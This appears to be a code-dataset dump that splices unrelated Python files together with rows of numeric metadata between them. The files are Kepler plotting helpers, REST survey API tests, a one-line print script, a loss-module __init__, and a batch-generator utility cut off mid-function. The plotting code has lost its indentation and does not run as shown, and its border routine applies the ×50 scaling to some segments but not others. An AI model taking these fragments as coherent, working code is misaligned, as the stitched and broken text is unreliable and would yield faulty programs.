ldata = np.append(ldata, y[i])
else:
plt.plot(ltime, ldata, color=lcolor, linestyle='-',
linewidth=lwidth)
ltime = np.array([], dtype='float64')
ldata = np.array([], dtype='float32')
plt.plot(ltime, ldata, color=lcolor, linestyle='-', linewidth=lwidth)
# plot the fill color below data time series, with no data gaps
if underfill:
plt.fill(x, y, fc=fcolor, linewidth=0.0, alpha=falpha)
def RangeOfPlot(x, y, pad, origin):
"""determine data limits"""
xmin = x.min()
xmax = x.max()
ymin = y.min()
ymax = y.max()
xr = xmax - xmin
yr = ymax - ymin
plt.xlim(xmin - xr * pad, xmax + xr * pad)
plt.ylim(ymin - yr * pad, ymax + yr * pad)
if origin:
if ymin - yr * pad <= 0.0:
plt.ylim(1.0e-10, ymax + yr * pad)
else:
plt.ylim(ymin - yr * pad, ymax + yr * pad)
def cleanx(time, logfile, verbose):
"""clean up x-axis of plot"""
try:
time0 = float(int(time[0] / 100) * 100.0)
if time0 < 2.4e6:
time0 += 2.4e6
timeout = time - time0
label = "BJD $-$ {}".format(time0)
except:
txt = ("ERROR -- KEPPLOT.CLEANX: cannot calculate plot scaling in "
"x dimension")
kepmsg.err(logfile, txt, verbose)
return timeout, label
def cleany(signal, cadence, logfile, verbose):
"""clean up y-axis of plot"""
try:
signal /= cadence
nrm = math.ceil(math.log10(np.nanmax(signal))) - 1.0
signal = signal / 10 ** nrm
if nrm == 0:
label = 'Flux (e$^-$ s$^{-1}$)'
else:
label = "Flux ($10^%d$" % nrm + "e$^-$ s$^{-1}$)"
except:
txt = ("ERROR -- KEPPLOT.CLEANY: cannot calculate plot scaling in "
"y dimension")
kepmsg.err(logfile, txt, verbose)
return signal, label
def limits(x, y, logfile, verbose):
"""plot limits"""
try:
xmin = x.min()
xmax = x.max()
ymin = y.min()
ymax = y.max()
xr = xmax - xmin
yr = ymax - ymin
x = np.insert(x, [0], [x[0]])
x = np.append(x, [x[-1]])
y = np.insert(y, [0], [0.0])
y = np.append(y, 0.0)
except:
txt = 'ERROR -- KEPPLOT.LIMITS: cannot calculate plot limits'
kepmsg.err(logfile, txt, verbose)
return x, y, xmin, xmax, xr, ymin, ymax, yr
def labels(xlab, ylab, labcol, fs):
"""plot labels"""
plt.xlabel(xlab, fontsize=fs, color=labcol)
plt.ylabel(ylab, fontsize=fs, color=labcol)
def intScale1D(image, imscale):
"""intensity scale limits of 1d array"""
nstat = 2; work2 = []
image = np.ma.array(image, mask=np.isnan(image))
work1 = np.array(np.sort(image), dtype=np.float32)
for i in range(len(work1)):
if 'nan' not in str(work1[i]).lower():
work2.append(work1[i])
work2 = np.array(work2, dtype=np.float32)
if int(float(len(work2)) / 10 + 0.5) > nstat:
nstat = int(float(len(work2)) / 10 + 0.5)
zmin = np.median(work2[:nstat])
zmax = np.median(work2[-nstat:])
if imscale == 'logarithmic':
if zmin < 0.0:
zmin = 100.0
if np.any(image <= 0):
image = np.log10(image + abs(image.min()) + 1)
else:
image = np.log10(image)
zmin = math.log10(zmin)
zmax = math.log10(zmax)
if imscale == 'squareroot':
if zmin < 0.0:
zmin = 100.0
if np.any(image < 0):
image = np.sqrt(image + abs(image.min()))
else:
image = np.sqrt(image)
zmin = math.sqrt(zmin)
zmax = math.sqrt(zmax)
return image, zmin, zmax
def intScale2D(image, imscale):
"""intensity scale limits of 2d array"""
nstat = 2
work1 = np.array([], dtype=np.float32)
(ysiz, xsiz) = np.shape(image)
for i in range(ysiz):
for j in range(xsiz):
if np.isfinite(image[i, j]) and image[i, j] > 0.0:
work1 = np.append(work1, image[i, j])
work2 = np.array(np.sort(work1))
if int(float(len(work2)) / 1000 + 0.5) > nstat:
nstat = int(float(len(work2)) / 1000 + 0.5)
zmin = np.median(work2[:nstat])
zmax = np.median(work2[-nstat:])
if imscale == 'logarithmic':
image = np.log10(image)
zmin = math.log10(zmin)
zmax = math.log10(zmax)
if imscale == 'squareroot':
image = np.sqrt(image)
zmin = math.sqrt(zmin)
zmax = math.sqrt(zmax)
return image, zmin, zmax
def borders(maskimg, xdim, ydim, pixcoord1, pixcoord2, bit, lcolor, lstyle, lwidth):
"""plot mask borders in CCD coordinates"""
for i in range(1, ydim):
for j in range(1, xdim):
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j, i], pixcoord2[j , i]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j, i], pixcoord2[j, i]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1], pixcoord2[j, i]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1],pixcoord2[j, i]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
# corner cases
for j in range(ydim):
try:
if (kepstat.bitInBitmap(maskimg[j, 0], bit) and not
kepstat.bitInBitmap(maskimg[j - 1,0], bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
try:
if (not kepstat.bitInBitmap(maskimg[j + 1, 0], bit) and
kepstat.bitInBitmap(maskimg[j,0],bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
if kepstat.bitInBitmap(maskimg[j, 0], bit):
x = np.array([pixcoord1[0, j], pixcoord1[0, j]]) - 0.5
try:
y = np.array([pixcoord2[0, j], pixcoord2[0, j + 1]]) - 0.5
except:
y = np.array([pixcoord2[0, j - 1], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[j, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, j], pixcoord1[xdim - 1, j]]) + 0.5
try:
y = (np.array([pixcoord2[xdim - 1, j],
pixcoord2[xdim - 1, j + 1]]) - 0.5)
except:
y = (np.array([pixcoord2[xdim - 1, j - 1],
pixcoord2[xdim - 1, j]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
for i in range(xdim):
try:
if (kepstat.bitInBitmap(maskimg[0, i], bit) and not
kepstat.bitInBitmap(maskimg[0, i - 1], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) - 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
except:
pass
try:
if (not kepstat.bitInBitmap(maskimg[0, i + 1], bit) and
kepstat.bitInBitmap(maskimg[0, i], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) + 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
if kepstat.bitInBitmap(maskimg[0, i], bit):
try:
x = np.array([pixcoord1[i, 0], pixcoord1[i + 1, 0]]) - 0.5
except:
x = np.array([pixcoord1[i - 1, 0], pixcoord1[i, 0]]) + 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 0]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[ydim - 1, i], bit):
try:
x = (np.array([pixcoord1[i, ydim - 1],
pixcoord1[i + 1, ydim - 1]]) - 0.5)
except:
x = (np.array([pixcoord1[i - 1, ydim - 1],
pixcoord1[i, ydim - 1]]) - 0.5)
y = np.array([pixcoord2[i, ydim - 1], pixcoord2[i, ydim - 1]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[ydim - 1, xdim - 1], bit):
x = (np.array([pixcoord1[xdim - 2, ydim - 1],
pixcoord1[xdim - 1, ydim - 1]]) + 0.5)
y = (np.array([pixcoord2[xdim - 1, ydim - 1],
pixcoord2[xdim - 1, ydim - 1]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[0, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, 0], pixcoord1[xdim - 1, 0]]) + 0.5
y = np.array([pixcoord2[xdim - 1, 0], pixcoord2[xdim - 1, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
return
def PrfBorders(maskimg,xdim,ydim,pixcoord1,pixcoord2,bit,lcolor,lstyle,lwidth):
"""plot mask borders in CCD coordinates"""
for i in range(1, ydim):
for j in range(1, xdim):
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j, i], pixcoord2[j, i]]) - 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i - 1, j], bit)):
x = np.array([pixcoord1[j - 1, i], pixcoord1[j, i]]) + 0.5
y = np.array([pixcoord2[j , i], pixcoord2[j, i]]) - 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
if (kepstat.bitInBitmap(maskimg[i, j], bit) and not
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1], pixcoord2[j, i]]) + 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
if (not kepstat.bitInBitmap(maskimg[i, j], bit) and
kepstat.bitInBitmap(maskimg[i, j - 1], bit)):
x = np.array([pixcoord1[j, i], pixcoord1[j, i]]) - 0.5
y = np.array([pixcoord2[j, i - 1], pixcoord2[j, i]]) + 0.5
plt.plot(x*50, y*50, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
# corner cases
for j in range(ydim):
try:
if (kepstat.bitInBitmap(maskimg[j, 0], bit) and not
kepstat.bitInBitmap(maskimg[j - 1, 0], bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
try:
if (not kepstat.bitInBitmap(maskimg[j + 1, 0], bit) and
kepstat.bitInBitmap(maskimg[j, 0], bit)):
x = np.array([pixcoord1[0, j], pixcoord1[1, j]]) - 0.5
y = np.array([pixcoord2[0, j], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
except:
pass
if kepstat.bitInBitmap(maskimg[j, 0], bit):
x = np.array([pixcoord1[0,j],pixcoord1[0,j]]) - 0.5
try:
y = np.array([pixcoord2[0, j], pixcoord2[0, j + 1]]) - 0.5
except:
y = np.array([pixcoord2[0, j - 1], pixcoord2[0, j]]) + 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[j, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, j], pixcoord1[xdim - 1, j]]) + 0.5
try:
y = (np.array([pixcoord2[xdim - 1, j],
pixcoord2[xdim - 1, j + 1]]) - 0.5)
except:
y = (np.array([pixcoord2[xdim - 1, j - 1],
pixcoord2[xdim - 1, j]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
for i in range(xdim):
try:
if (kepstat.bitInBitmap(maskimg[0, i], bit) and not
kepstat.bitInBitmap(maskimg[0, i - 1], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) - 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
        except IndexError:
            # skip when a neighbouring pixel falls outside the grid
            pass
try:
if (not kepstat.bitInBitmap(maskimg[0, i + 1], bit) and
kepstat.bitInBitmap(maskimg[0, i], bit)):
x = np.array([pixcoord1[i, 0], pixcoord1[i, 0]]) + 0.5
y = np.array([pixcoord2[i, 0], pixcoord2[i, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle,
linewidth=lwidth)
        except IndexError:
            # i + 1 runs past the right edge of the mask; skip
            pass
if kepstat.bitInBitmap(maskimg[0, i], bit):
try:
x = np.array([pixcoord1[i, 0], pixcoord1[i + 1, 0]]) - 0.5
            except IndexError:
x = np.array([pixcoord1[i - 1, 0], pixcoord1[i, 0]]) + 0.5
            y = np.array([pixcoord2[i, 0], pixcoord2[i, 0]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[ydim - 1, i], bit):
try:
x = (np.array([pixcoord1[i, ydim - 1],
                               pixcoord1[i + 1, ydim - 1]]) - 0.5)
            except IndexError:
x = (np.array([pixcoord1[i - 1, ydim - 1],
pixcoord1[i, ydim - 1]]) - 0.5)
y = (np.array([pixcoord2[i, ydim - 1],
pixcoord2[i, ydim - 1]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
    if kepstat.bitInBitmap(maskimg[ydim - 1, xdim - 1], bit):
x = (np.array([pixcoord1[xdim - 2, ydim - 1],
pixcoord1[xdim - 1, ydim - 1]]) + 0.5)
y = (np.array([pixcoord2[xdim - 1, ydim - 1],
pixcoord2[xdim - 1, ydim - 1]]) + 0.5)
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
if kepstat.bitInBitmap(maskimg[0, xdim - 1], bit):
x = np.array([pixcoord1[xdim - 1, 0], pixcoord1[xdim - 1, 0]]) + 0.5
y = np.array([pixcoord2[xdim - 1, 0], pixcoord2[xdim - 1, 1]]) - 0.5
plt.plot(x, y, color=lcolor, linestyle=lstyle, linewidth=lwidth)
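# A hedged usage sketch for PrfBorders on a tiny synthetic mask. The
# coordinate-grid layout and the flag value are assumptions for illustration
# (kepstat, numpy as np, and matplotlib.pyplot as plt must be importable).
# Note the interior segments are drawn scaled by 50 while the edge segments
# are not, so real inputs are presumably already in the scaled PRF frame.
if __name__ == "__main__":
    xdim, ydim = 4, 3
    maskimg = np.zeros((ydim, xdim), dtype=int)
    maskimg[1, 1:3] = 2  # set flag bit 2 on two interior pixels
    # pixcoord1[j, i] is the column coordinate, pixcoord2[j, i] the row
    pixcoord1 = np.tile(np.arange(xdim)[:, None], (1, ydim))
    pixcoord2 = np.tile(np.arange(ydim)[None, :], (xdim, 1))
    PrfBorders(maskimg, xdim, ydim, pixcoord1, pixcoord2, 2, 'red', '-', 1.0)
    plt.show()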
| 43.116915 | 84 | 0.515087 | 2,345 | 17,333 | 3.804264 | 0.091684 | 0.056496 | 0.123305 | 0.06098 | 0.793633 | 0.783544 | 0.772335 | 0.747226 | 0.735344 | 0.723686 | 0 | 0.054033 | 0.328391 | 17,333 | 401 | 85 | 43.224439 | 0.71231 | 0.037212 | 0 | 0.755747 | 0 | 0 | 0.019549 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031609 | false | 0.022989 | 0.011494 | 0 | 0.063218 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 6 | 40248b59c2a3a7e2ac873ee376548f2f0cf9670c | 8,445 | py | Python | tests/controllers/test_survey.py | reputage/SQSurvey | 938a59806fa0877205a1a460ceb23ecdf2fa9201 | ["Apache-2.0"] | null | null | null | tests/controllers/test_survey.py | reputage/SQSurvey | 938a59806fa0877205a1a460ceb23ecdf2fa9201 | ["Apache-2.0"] | null | null | null | tests/controllers/test_survey.py | reputage/SQSurvey | 938a59806fa0877205a1a460ceb23ecdf2fa9201 | ["Apache-2.0"] | null | null | null |
import falcon
import uuid
try:
import simplejson as json
except ImportError:
import json
from didery.routing import *
from didery.db.dbing import BaseSurveyDB, DB, DB_SURVEY_RESULTS_NAME
def testSurveyPost(client):
surveyResult = {
"ip_address": "127.0.0.1"
}
response = client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
resp_data = json.loads(response.content)
resp_key = list(resp_data.keys())[0]
assert len(resp_data) == 1
assert resp_data[resp_key]["survey_data"] == surveyResult
def testSurveyGetAll(client):
surveyResult = {
"ip_address": "127.0.0.1"
}
client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
response = json.loads(client.simulate_get(SURVEY_BASE_PATH).content)
assert len(response["data"]) == 1
for survey in response["data"].values():
assert survey["survey_data"] == surveyResult
def testSurveyGet(client):
surveyResult = {
"ip_address": "127.0.0.1"
}
response = client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
    resp_id = list(json.loads(response.content).keys())[0]
    response = client.simulate_get("{}/{}".format(SURVEY_BASE_PATH, resp_id))
    assert json.loads(response.content)["survey_data"] == surveyResult
def testSurveyGetAllInvalidQueryString(client):
# Test that query params have values
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string missing value(s)."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=10&limit")
exp_result = {
"title": "Malformed Query String",
"description": "url query string missing value(s)."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testSurveyGetAllInvalidQueryValue(client):
    # Test that query param values are integers
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=a&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=10&limit=d")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testSurveyGetAllNegativeQueryValue(client):
    # Test that negative query param values are rejected
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=-1&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a positive number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=-10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a positive number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testSurveyGetAllEmptyQueryValue(client):
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=10&limit=")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=&limit=10")
exp_result = {
"title": "Malformed Query String",
"description": "url query string value must be a number."
}
assert response.status == falcon.HTTP_400
assert json.loads(response.content) == exp_result
def testValidGetAllWithQueryString(client):
db = BaseSurveyDB(DB(DB_SURVEY_RESULTS_NAME))
exp_result = {"data": {}}
for i in range(0, 11):
history = {
"id": "did:dad:NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw=",
"changed": "2000-01-01T00:00:01+00:00",
"signer": 1,
"signers": [
"NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw=",
"NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw=",
"NOf6ZghvGNbFc_wr3CC0tKZHz1qWAR4lD5aM-i0zSjw="
]
}
uid = str(uuid.uuid4())
db.save(uid, history)
exp_result["data"][uid] = history
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=11")
result = json.loads(response.content)
assert response.status == falcon.HTTP_200
assert result == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=20")
result = json.loads(response.content)
assert response.status == falcon.HTTP_200
assert result == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=0&limit=0")
result = json.loads(response.content)
exp_result = {"data": {}}
assert response.status == falcon.HTTP_200
assert result == exp_result
response = client.simulate_get(SURVEY_BASE_PATH, query_string="offset=100&limit=10")
assert response.status == falcon.HTTP_200
assert json.loads(response.content) == exp_result
def testPostBodySize(client):
surveyResult = {
"Name": "xyz",
"Email": "xyz@domain.com",
"Response": {
"Rank each of the five game concepts on ease of navigation.-SeedQuest": "1",
"Rank each of the five game concepts on ease of navigation.-Cliffside": "1",
"Rank each of the five game concepts on ease of navigation.-Laboratory": "1",
"Rank each of the five game concepts on ease of navigation.-Mind Palace": "1",
"Rank each of the five game concepts on ease of navigation.-Flatlands": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-SeedQuest": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-Laboratory": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-Mind Palace": "1",
"Rank each of the five game concepts on how intuitive and enjoyable the gameplay is.-Flatlands": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-SeedQuest": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Cliffside": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Laboratory": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Mind Palace": "1",
"Rank each of the five game concepts on how quickly you were able to learn the game path.-Flatlands": "1",
"Rank each of the five game concepts on overall experience.-SeedQuest": "4th",
"Rank each of the five game concepts on overall experience.-Cliffside": "3rd",
"Rank each of the five game concepts on overall experience.-Laboratory": "4th",
"Rank each of the five game concepts on overall experience.-Memory Palace": "5th",
"Rank each of the five game concepts on overall experience.-Flatlands": "5th",
"Do you have any other comments or suggestions about any of the game concepts-Game Navigation": "ewfsdcxcdsfewrfsdczxds",
"Do you have any other comments or suggestions about any of the game concepts-Memorability": "1",
"Do you have any other comments or suggestions about any of the game concepts-Art Style": "1"
}
}
data = json.dumps(surveyResult)
assert len(data) > 1000
response = client.simulate_post(SURVEY_BASE_PATH, body=json.dumps(surveyResult).encode())
assert response.status == falcon.HTTP_201
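# These tests rely on a pytest fixture named `client` defined elsewhere
# (typically conftest.py). A minimal sketch of such a fixture built on
# falcon's testing helpers; the app factory import is an assumption for
# illustration and may not match the real project layout:
#
# import pytest
# from falcon import testing
# from didery.app import loadApp          # hypothetical app factory
#
# @pytest.fixture
# def client():
#     return testing.TestClient(loadApp())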
| 36.877729 | 133 | 0.678271 | 1,080 | 8,445 | 5.188889 | 0.149074 | 0.054961 | 0.033904 | 0.044076 | 0.800678 | 0.78444 | 0.739293 | 0.733405 | 0.720021 | 0.720021 | 0 | 0.025408 | 0.217052 | 8,445 | 228 | 134 | 37.039474 | 0.822142 | 0.013262 | 0 | 0.40625 | 0 | 0.00625 | 0.370633 | 0.050666 | 0 | 0 | 0 | 0 | 0.19375 | 1 | 0.05625 | false | 0 | 0.04375 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 6 | 40424aca71843a5d8a65b235194039f86d210ad3 | 39 | py | Python | sandbox/michelle.py | writecrow/crow_training | 17324ce93608acf997c2880b587dd9483729b895 | ["MIT"] | 7 | 2018-02-27T15:24:10.000Z | 2018-02-27T22:20:58.000Z | sandbox/michelle.py | writecrow/crow_training | 17324ce93608acf997c2880b587dd9483729b895 | ["MIT"] | 11 | 2018-02-21T03:07:44.000Z | 2018-02-27T22:33:29.000Z | sandbox/michelle.py | writecrow/crow_training | 17324ce93608acf997c2880b587dd9483729b895 | ["MIT"] | null | null | null |
print("Hello Mark, This is Michelle.")
| 19.5 | 38 | 0.717949 | 6 | 39 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 39 | 1 | 39 | 39 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0.74359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0 | 6 | 40b2f20c94f194cf5bff0b09adc65a2debeb1e55 | 160 | py | Python | paz/optimization/__init__.py | niqbal996/paz | f27205907367415d5b21f90e1a1d1d1ce598e889 | ["MIT"] | 300 | 2020-10-29T08:02:05.000Z | 2022-03-30T21:47:32.000Z | paz/optimization/__init__.py | albertofernandezvillan/paz | 9fbd50b993f37e1e807297a29c6044c09967c9cc | ["MIT"] | 30 | 2020-10-29T12:40:32.000Z | 2022-03-31T14:06:35.000Z | paz/optimization/__init__.py | albertofernandezvillan/paz | 9fbd50b993f37e1e807297a29c6044c09967c9cc | ["MIT"] | 62 | 2020-10-29T12:34:13.000Z | 2022-03-29T05:21:45.000Z |
from .losses import MultiBoxLoss
from .losses import KeypointNetLoss
from .losses import DiceLoss
from .losses import FocalLoss
from .losses import JaccardLoss
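# These re-exports let callers import every loss from the package root. A
# hedged usage sketch (the constructor arguments, if any, are assumptions;
# consult the paz documentation for the real signatures):
#
# from paz.optimization import DiceLoss
# model.compile(optimizer='adam', loss=DiceLoss())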
| 26.666667 | 35 | 0.84375 | 20 | 160 | 6.75 | 0.4 | 0.37037 | 0.592593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 160 | 5 | 36 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 |
0 | 6 | 40d039b83d423a7126f84f03e449445afb22d6d6 | 3,249 | py | Python | utility/feed_generation_utility.py | etfrenchvcu/DeepPrime2Sec | a61146c7c7d8a0f8821717b9f7aed8703cfdb2a1 | ["Apache-2.0"] | 18 | 2019-07-17T01:53:03.000Z | 2021-12-10T13:08:51.000Z | utility/feed_generation_utility.py | etfrenchvcu/DeepPrime2Sec | a61146c7c7d8a0f8821717b9f7aed8703cfdb2a1 | ["Apache-2.0"] | 18 | 2019-10-13T02:45:50.000Z | 2022-02-10T00:17:06.000Z | utility/feed_generation_utility.py | etfrenchvcu/DeepPrime2Sec | a61146c7c7d8a0f8821717b9f7aed8703cfdb2a1 | ["Apache-2.0"] | 9 | 2019-07-26T01:16:26.000Z | 2020-11-14T01:57:24.000Z |
import numpy as np
from utility.file_utility import FileUtility
def train_batch_generator_408(batch_size=64):
    '''
    Yield padded training batches (X, Y, W) of at most `batch_size`
    sequences, cycling over the training set indefinitely.
    :param batch_size: number of sequences per batch
    :return: generator of (X, Y, sample-weight mask) tuples
    '''
    start_idx = 0
    train_lengths = [int(j) for j in FileUtility.load_list(
        'datasets/train_length.txt')]
    X_train = np.load('datasets/X_train_408.npy')
    Y_train = np.array(
        np.load('datasets/train_mat_Y.npy'))
    while True:
        if not start_idx < len(train_lengths):
            start_idx = 0
        # trim every sequence in the batch to the longest length it contains
        end_idx = min(start_idx + batch_size, len(train_lengths))
        max_len = train_lengths[end_idx - 1]
        X = X_train[start_idx:end_idx, 0:max_len]
        Y = Y_train[start_idx:end_idx, 0:max_len, :]
        W = []
        for idx in range(start_idx, end_idx):
            W.append([1 if l < train_lengths[idx] else 0
                      for l in range(0, max_len)])
        start_idx += batch_size
        yield X, Y, np.array(W)
def validation_batch_generator_408(batch_size=100):
    '''
    Yield padded validation batches (X, Y, W), cycling over the test set
    indefinitely.
    :param batch_size: number of sequences per batch
    :return: generator of (X, Y, sample-weight mask) tuples
    '''
test_lengths = [int(i) for i in FileUtility.load_list(
'datasets/test_length.txt')]
X_test = np.load('datasets/X_test_408.npy')
Y_test = np.array(
np.load('datasets/test_mat_Y.npy'))
